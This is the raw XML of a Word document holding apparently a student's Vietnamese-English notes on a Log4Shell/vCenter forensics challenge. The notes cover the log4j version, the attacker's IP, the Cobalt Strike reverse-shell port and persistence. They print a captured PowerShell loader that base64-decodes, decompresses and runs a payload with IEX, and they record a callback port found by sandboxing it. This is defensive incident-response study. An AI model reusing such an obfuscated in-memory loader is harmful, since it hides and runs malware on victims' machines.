          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.What is the version of the log4j library used by the installed VMware product?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DB0082" w14:textId="57E39851" w:rsidR="00D75C85" w:rsidRDefault="005F6E32" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="00462F9F" w:rsidRPr="0034529C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://communities.vmware.com/t5/VMware-vCenter-Discussions/vCenter-6-7-for-Windows-Build-19300125-Log4j/td-p/2910559</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22025193" w14:textId="77777777" w:rsidR="00D75C85" w:rsidRPr="00D75C85" w:rsidRDefault="00D75C85" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46459D34" w14:textId="322A922A" w:rsidR="00D75C85" w:rsidRPr="003C131C" w:rsidRDefault="00D75C85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 w:rsidRPr="00D75C85">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.What is the log4j library log level specified in the configuration file? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26363086" w14:textId="2739EF66" w:rsidR="00D75C85" w:rsidRPr="003C131C" w:rsidRDefault="00D75C85" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C131C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Google: log4j2 level file configuration vmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A1E21C" w14:textId="7F256980" w:rsidR="00D75C85" w:rsidRPr="003C131C" w:rsidRDefault="005F6E32" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="00D75C85" w:rsidRPr="003C131C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://kb.vmware.com/s/article/2149228</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D63A342" w14:textId="530B1617" w:rsidR="00D75C85" w:rsidRPr="003C131C" w:rsidRDefault="005F6E32" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidR="00D75C85" w:rsidRPr="003C131C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://docs.vmware.com/en/vRealize-Operations-Manager/8.1/com.vmware.vcom.config.doc/GUID-CE444BCB-6236-4778-8DB1-3796F3D71D7C.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34C39438" w14:textId="77777777" w:rsidR="00D75C85" w:rsidRPr="00D75C85" w:rsidRDefault="00D75C85" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AC9F91" w14:textId="38380C2C" w:rsidR="00D75C85" w:rsidRPr="003C131C" w:rsidRDefault="00D75C85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 w:rsidRPr="00D75C85">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5937D730" w14:textId="0877B6A2" w:rsidR="00D75C85" w:rsidRPr="00D75C85" w:rsidRDefault="00462F9F" w:rsidP="003C131C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r w:rsidR="00D75C85" w:rsidRPr="00D75C85">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log4shell.huntress.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> check thời gian </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3472690D" w14:textId="438520A6" w:rsidR="00D75C85" w:rsidRPr="003C131C" w:rsidRDefault="00D75C85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 w:rsidRPr="00D75C85">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.When was the first successful login to vsphere WebClient?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65426528" w14:textId="00043A1F" w:rsidR="00D75C85" w:rsidRDefault="003C131C" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C131C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Google: vSphere Single-Sign On process writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36669E" w14:textId="2B9BDF1F" w:rsidR="00D75C85" w:rsidRDefault="005F6E32" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidR="003C131C" w:rsidRPr="0034529C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.security.doc/GUID-FBECACED-E9E2-4DE5-A4D2-3587D90D2420.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B099186" w14:textId="77777777" w:rsidR="00D75C85" w:rsidRPr="00D75C85" w:rsidRDefault="00D75C85" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2434D671" w14:textId="07D81F2C" w:rsidR="00D75C85" w:rsidRDefault="00D75C85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 w:rsidRPr="00D75C85">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.What is the attacker’s IP address? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0930828D" w14:textId="4A6FAECC" w:rsidR="00D75C85" w:rsidRDefault="00971511" w:rsidP="009C6605">
      <w:pPr>
        <w:ind w:left="284"/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</w:pPr>
      <w:r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  <w:t xml:space="preserve">Trong tệp Aud_events.log, tất cả các mục nhập log4shell.huntress.com được liên kết với cùng một địa chỉ IP: 192.168.112.128 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757F61F2" w14:textId="77777777" w:rsidR="003E089D" w:rsidRDefault="003E089D" w:rsidP="009C6605">
      <w:pPr>
        <w:ind w:left="284"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="4DA162F4" w14:textId="2A28DF04" w:rsidR="00D75C85" w:rsidRDefault="003E089D" w:rsidP="009C6605">
      <w:pPr>
        <w:ind w:left="284"/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</w:pPr>
      <w:r w:rsidRPr="003E089D"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  <w:t>Vmware</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E089D"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  <w:t>syslog</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E089D">
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>collector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5A234A" w14:textId="441F45F5" w:rsidR="00D75C85" w:rsidRDefault="005F6E32" w:rsidP="009C6605">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="003E089D" w:rsidRPr="0034529C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://docs.vmware.com/en/VMware-vSphere/6.0/com.vmware.vsphere.vcenterhost.doc/GUID-61E7E2EA-F531-4665-9225-58BA899F55A5.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08F5C71A" w14:textId="11427564" w:rsidR="00D75C85" w:rsidRDefault="00814BB4" w:rsidP="009C6605">
      <w:pPr>
        <w:ind w:left="28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3F085" wp14:editId="06CA12DE">
            <wp:extent cx="5943600" cy="6972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83C2" w14:textId="34EBADCE" w:rsidR="00D75C85" w:rsidRDefault="00814BB4" w:rsidP="009C6605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Một yêu cầu http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50779293" w14:textId="2CFE5402" w:rsidR="00D75C85" w:rsidRDefault="001E063D" w:rsidP="009C6605">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khác so với log localhost thông thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A29D66" w14:textId="277CFE6A" w:rsidR="00D75C85" w:rsidRDefault="00D75C85" w:rsidP="009C6605">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0138F05E" w14:textId="77777777" w:rsidR="00D75C85" w:rsidRPr="00D75C85" w:rsidRDefault="00D75C85" w:rsidP="009C6605">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EAA7BBC" w14:textId="11EB45C9" w:rsidR="00B66843" w:rsidRDefault="00D75C85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 w:rsidRPr="00D75C85">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.What is the port the attacker used to receive the cobalt strike reverse shel</w:t>
      </w:r>
      <w:r w:rsidR="00B66843">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AAD9A0" w14:textId="6913D176" w:rsidR="00B66843" w:rsidRDefault="00B66843" w:rsidP="00B66843">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="161C2D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E063D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hint:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E063D">
        <w:rPr>
          <w:color w:val="161C2D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check Microsoft-Windows-PowerShell%4Operational.evtx. Look for encoded base64 commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38578957" w14:textId="45418148" w:rsidR="001E063D" w:rsidRDefault="008D1F52" w:rsidP="00B66843">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1F52">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ScriptBlock: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D097BC0" w14:textId="6FDD5CD3" w:rsidR="008D1F52" w:rsidRDefault="008D1F52" w:rsidP="00B66843">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3EF008" w14:textId="477FAD6C" w:rsidR="008D1F52" w:rsidRDefault="008D1F52" w:rsidP="00B66843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Base64 và </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1F52">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Gzip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082CE5E6" w14:textId="67F04573" w:rsidR="008D1F52" w:rsidRPr="008D1F52" w:rsidRDefault="008D1F52" w:rsidP="00B66843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>Giải mã đoạn script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0E9A5" w14:textId="6C87DC77" w:rsidR="00B66843" w:rsidRDefault="008D1F52" w:rsidP="00B66843">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vẫn chưa thấy port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3321B49F" w14:textId="0A588598" w:rsidR="008D1F52" w:rsidRDefault="008D1F52" w:rsidP="00B66843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Có 1 đoạn </w:t>
      </w:r>
      <w:r w:rsidR="00E916AF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>base64 giải mã tiếp xem có port hay k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B18D47" w14:textId="3063F24E" w:rsidR="008D1F52" w:rsidRDefault="00E916AF" w:rsidP="00B66843">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chỉ thấy ip hacker như vẫn chưa thấy port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05537587" w14:textId="7C7D7F33" w:rsidR="00E916AF" w:rsidRDefault="007F27CD" w:rsidP="00B66843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Có 2 giải pháp lưu file virus .ps1 rồi chạy xem port </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259013E2" w14:textId="23578697" w:rsidR="007F27CD" w:rsidRDefault="007F27CD" w:rsidP="00B66843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Trên sandbox port 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEC7F21" w14:textId="6FD31F40" w:rsidR="007F27CD" w:rsidRDefault="007F27CD" w:rsidP="00B66843">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trên máy ảo + fakenet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1162D6A2" w14:textId="77777777" w:rsidR="007F27CD" w:rsidRDefault="007F27CD" w:rsidP="00B66843">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0D24CA" w14:textId="77777777" w:rsidR="007F27CD" w:rsidRDefault="007F27CD" w:rsidP="00B66843">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1361CE" w14:textId="26592ADC" w:rsidR="00D75C85" w:rsidRDefault="00B66843" w:rsidP="003C131C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="284" w:firstLine="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B66843">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What is the executable used by the attacker to gain persistence?</w:t>
      </w:r>
      <w:r w:rsidR="00D75C85" w:rsidRPr="00D75C85">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D7B855" w14:textId="1CC741D7" w:rsidR="00B66843" w:rsidRDefault="00B66843" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="161C2D"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233587FC" w14:textId="7713D613" w:rsidR="00B66843" w:rsidRDefault="005F6E32" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="161C2D"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="00B66843" w:rsidRPr="0034529C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://www.cynet.com/attack-techniques-hands-on/the-art-of-persistence/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60ECF79A" w14:textId="4F089275" w:rsidR="00B66843" w:rsidRDefault="00B66843" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="161C2D"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E78094" w14:textId="77777777" w:rsidR="00B66843" w:rsidRDefault="00B66843" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="161C2D"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EFA2DE" w14:textId="77777777" w:rsidR="00F263AA" w:rsidRDefault="00F263AA" w:rsidP="003C131C">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0436AB83" w14:textId="0B135DB1" w:rsidR="00D75C85" w:rsidRDefault="00D75C85">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="000DDF14" w14:textId="77777777" w:rsidR="00094E03" w:rsidRPr="00F62ADB" w:rsidRDefault="00094E03" w:rsidP="00F62ADB"/>
    <w:sectPr w:rsidR="00094E03" w:rsidRPr="00F62ADB" w:rsidSect="0043207A">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="709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C3B82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35FA445A"/>
    <w:lvl w:ilvl="0" w:tplc="9D62377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CAA2D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2C63B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64B6F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DEF9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30C43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AC89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1299B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8238E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284"/>
    <w:rsid w:val="00027BFC"/>
    <w:rsid w:val="00050910"/>
    <w:rsid w:val="00071451"/>
    <w:rsid w:val="00094E03"/>
    <w:rsid w:val="000C21E8"/>
    <w:rsid w:val="00171335"/>
    <w:rsid w:val="001C130C"/>
    <w:rsid w:val="001C6518"/>
    <w:rsid w:val="001D4D0E"/>
    <w:rsid w:val="001E063D"/>
    <w:rsid w:val="00216C23"/>
    <w:rsid w:val="00274D5F"/>
    <w:rsid w:val="00290FCB"/>
    <w:rsid w:val="002D2E62"/>
    <w:rsid w:val="002E7A6D"/>
    <w:rsid w:val="00317F0A"/>
    <w:rsid w:val="00327D8A"/>
    <w:rsid w:val="0034203A"/>
    <w:rsid w:val="00393D79"/>
    <w:rsid w:val="003C06A1"/>
    <w:rsid w:val="003C131C"/>
    <w:rsid w:val="003D149C"/>
    <w:rsid w:val="003D371C"/>
    <w:rsid w:val="003E089D"/>
    <w:rsid w:val="003E3066"/>
    <w:rsid w:val="004214A3"/>
    <w:rsid w:val="0043207A"/>
    <w:rsid w:val="00443BD7"/>
    <w:rsid w:val="00462F9F"/>
    <w:rsid w:val="00486C6B"/>
    <w:rsid w:val="004B14C9"/>
    <w:rsid w:val="004E4E80"/>
    <w:rsid w:val="00592269"/>
    <w:rsid w:val="005C566B"/>
    <w:rsid w:val="005E2E44"/>
    <w:rsid w:val="005F6E32"/>
    <w:rsid w:val="0064132C"/>
    <w:rsid w:val="0064278E"/>
    <w:rsid w:val="006A0503"/>
    <w:rsid w:val="006A1A4F"/>
    <w:rsid w:val="006C6E3B"/>
    <w:rsid w:val="00727889"/>
    <w:rsid w:val="007B71B8"/>
    <w:rsid w:val="007C5B7A"/>
    <w:rsid w:val="007F27CD"/>
    <w:rsid w:val="00814BB4"/>
    <w:rsid w:val="00853E6A"/>
    <w:rsid w:val="00861B2B"/>
    <w:rsid w:val="008838CC"/>
    <w:rsid w:val="008D1F52"/>
    <w:rsid w:val="008E1284"/>
    <w:rsid w:val="00902E4A"/>
    <w:rsid w:val="009562C0"/>
    <w:rsid w:val="00971511"/>
    <w:rsid w:val="009B240D"/>
    <w:rsid w:val="009C33BB"/>
    <w:rsid w:val="009C6605"/>
    <w:rsid w:val="00A3353E"/>
    <w:rsid w:val="00A51252"/>
    <w:rsid w:val="00A621F9"/>
    <w:rsid w:val="00A7069F"/>
    <w:rsid w:val="00A743DF"/>
    <w:rsid w:val="00A84C62"/>
    <w:rsid w:val="00AC46BA"/>
    <w:rsid w:val="00AC7778"/>
    <w:rsid w:val="00B17C48"/>
    <w:rsid w:val="00B66843"/>
    <w:rsid w:val="00C10024"/>
    <w:rsid w:val="00C1135B"/>
    <w:rsid w:val="00C44F36"/>
    <w:rsid w:val="00C7247D"/>
    <w:rsid w:val="00C73A69"/>
    <w:rsid w:val="00C82092"/>
    <w:rsid w:val="00CF317C"/>
    <w:rsid w:val="00D36FEA"/>
    <w:rsid w:val="00D4700F"/>
    <w:rsid w:val="00D675BA"/>
    <w:rsid w:val="00D75C85"/>
    <w:rsid w:val="00E603C2"/>
    <w:rsid w:val="00E916AF"/>
    <w:rsid w:val="00EE2A5F"/>
    <w:rsid w:val="00F12FE1"/>
    <w:rsid w:val="00F263AA"/>
    <w:rsid w:val="00F62ADB"/>
    <w:rsid w:val="00F9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8D691"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{43B6052A-ABCC-4FD3-AD5C-1E83C06E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C46BA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="pw-post-body-paragraph">
    <w:name w:val="pw-post-body-paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D67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4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43D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71451"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00094E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E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684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66843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9562C0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="70" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="768" w:right="115" w:firstLine="1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562C0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs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87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1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6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0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9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1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33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65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b.vmware.com/s/article/8708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kb.vmware.com/s/article/2149228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kb.vmware.com/s/article/2149228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communities.vmware.com/t5/VMware-vCenter-Discussions/vCenter-6-7-for-Windows-Build-19300125-Log4j/td-p/291055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docs.vmware.com/en/VMware-vSphere/6.0/com.vmware.vsphere.vcenterhost.doc/GUID-61E7E2EA-F531-4665-9225-58BA899F55A5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ocs.vmware.com/en/VMware-vSphere/6.0/com.vmware.vsphere.vcenterhost.doc/GUID-61E7E2EA-F531-4665-9225-58BA899F55A5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docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.security.doc/GUID-FBECACED-E9E2-4DE5-A4D2-3587D90D2420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vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.security.doc/GUID-FBECACED-E9E2-4DE5-A4D2-3587D90D2420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docs.vmware.com/en/vRealize-Operations-Manager/8.1/com.vmware.vcom.config.doc/GUID-CE444BCB-6236-4778-8DB1-3796F3D71D7C.html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docs.vmware.com/en/vRealize-Operations-Manager/8.1/com.vmware.vcom.config.doc/GUID-CE444BCB-6236-4778-8DB1-3796F3D71D7C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cynet.com/attack-techniques-hands-on/the-art-of-persistenc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cynet.com/attack-techniques-hands-on/the-art-of-persistence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communities.vmware.com/t5/VMware-vCenter-Discussions/vCenter-6-7-for-Windows-Build-19300125-Log4j/td-p/291055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21</Pages>
  <Words>1822</Words>
  <Characters>10391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Kiệt</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyễn Kiệt</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-11T07:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-01T13:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>